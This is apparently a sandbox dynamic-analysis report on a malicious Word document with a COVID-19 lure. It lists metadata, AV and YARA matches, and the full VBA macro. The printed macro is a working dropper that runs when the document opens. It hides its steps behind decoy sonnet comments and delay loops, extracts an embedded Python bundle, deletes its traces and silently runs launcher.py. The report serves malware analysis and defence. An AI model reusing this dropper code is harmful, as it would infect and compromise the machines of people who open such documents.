VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: | - |
Threat Names: |
VB.EmoooDldr.2.Gen
|
VPIyNbbmtoYiYfrB.doc
Word Document
Created at 2020-04-15T11:03:00
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\FD1HVy\Desktop\VPIyNbbmtoYiYfrB.doc | Sample File | Word Document |
Malicious
|
...
|
»
Office Information
»
Creator | Jeremy |
Last Modified By | Jeremy |
Revision | 251 |
Create Time | 2019-11-11 06:20:00+00:00 |
Modify Time | 2020-04-13 19:26:00+00:00 |
Document Information
»
Codepage | ANSI_Cyrillic |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Company | SPecialiST RePack |
Document Security | SECURITY_LOCKED |
Editing Time | 264540.0 |
Page Count | 3 |
Line Count | 39 |
Paragraph Count | 11 |
Word Count | 839 |
Character Count | 4787 |
Chars With Spaces | 5615 |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
ActiveDocument.ActiveWindow.View.ReadingLayout = False
ActiveDocument.Unprotect "securePass"
show
ActiveDocument.Protect wdAllowOnlyReading, True, "securePass", False, False
Dim data As String
Dim User As String
Dim bla As String
Dim Coper As Object
User = "C:\Users\Public"
Docer = ActiveDocument.FullName
'Copy
Call Shell("cmd /c copy " + Docer + " " + User + "\docer.doc", vbHide)
deay (4)
data = bin2var(User + "\docer.doc")
data = Right(data, 7074638)
var2bin User + "\smile.zip", data
bla = VBA.FileSystem.Dir(User + "\Python37", vbDirectory)
If bla <> VBA.Constants.vbNullString Then
Call Shell("cmd /c rmdir /s /q " + User + "\Python37", vbHide)
deay (2)
End If
'Unzip
Unzip User + "\smile.zip", User, "Python37"
'Clean
Kill User + "\smile.zip"
Kill User + "\docer.doc"
'Run
Call Shell("""" & User & "\Python37\python.exe" & """ """ & User & "\Python37\launcher.py" & """", vbHide)
End Sub
Function bin2var(filename As String) As String
'Which alters when it alteration finds,
'Or bends with the remover to remove.
Dim f As Integer
f = FreeFile()
Open filename For Binary Access Read Lock Write As #f
bin2var = Space(FileLen(filename))
Get #f, , bin2var
Close #f
'O no! it is an ever-fixed mark
'That looks on tempests and is never shaken;
End Function
'It is the star to every wand'ring bark,
'Whose worth 's unknown, although his height be taken.
'Love 's not Time's fool, though rosy lips and cheeks
'Within his bending sickle's compass come;
Sub var2bin(filename As String, data As String)
'If this be error and upon me prov'd,
'I never writ, nor no man ever lov'd.
Dim f As Integer
f = FreeFile()
Open filename For Output Access Write Lock Write As #f
Print #f, data;
Close #f
End Sub
'Love alters not with his brief hours and weeks,
'But bears it out even to the edge of doom.
Sub Unzip(Fname As Variant, DefPath As String, TarFold As String)
Dim oApp As Object
Dim FileNameFolder As Variant
'Root folder for the new folder.
If Right(DefPath, 1) <> "\" Then
DefPath = DefPath & "\"
End If
'Create the folder name
strDate = Format(Now, " dd-mm-yy h-mm-ss")
FileNameFolder = DefPath & TarFold & "\"
'Make the normal folder in DefPath
MkDir FileNameFolder
'Extract the files into the newly created folder
Set oApp = CreateObject("Shell.Application")
oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, 4
End Sub
Sub hide()
ActiveDocument.Sections(1).Range.Font.Hidden = False
For Each Section In ActiveDocument.Sections
If Section.Index > 1 Then Section.Range.Font.Hidden = True
Next
End Sub
Sub show()
ActiveDocument.Sections(1).Range.Font.Hidden = True
For Each Section In ActiveDocument.Sections
If Section.Index > 1 Then Section.Range.Font.Hidden = False
Next
End Sub
Function deay(min)
Dim ptr
ptr = DateAdd("s", min, Time())
If ptr > Time() Then
Do Until (Time() > ptr)
Loop
End If
End Function
Document Content Snippet
»
W l "] ) ) ) ) ) ) ) ) g g ) ) ) ) ~g ) ) ) ) l ) ) ) ) ) ) ) ) ) \ m : C O V I D - 1 9 s Yb Yb i n d Yn a ... |
Local AV Matches (1)
»
Threat Name | Severity |
---|---|
VB.EmoooDldr.2.Gen |
Malicious
|
YARA Matches (2)
»
Rule Name | Rule Description | Classification | Score | Actions |
---|---|---|---|---|
VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|
VBA_Time_Delay_Loops | VBA macro utilizes time delay loops; possible impact upon dynamic analysis | - |
1/5
|
...
|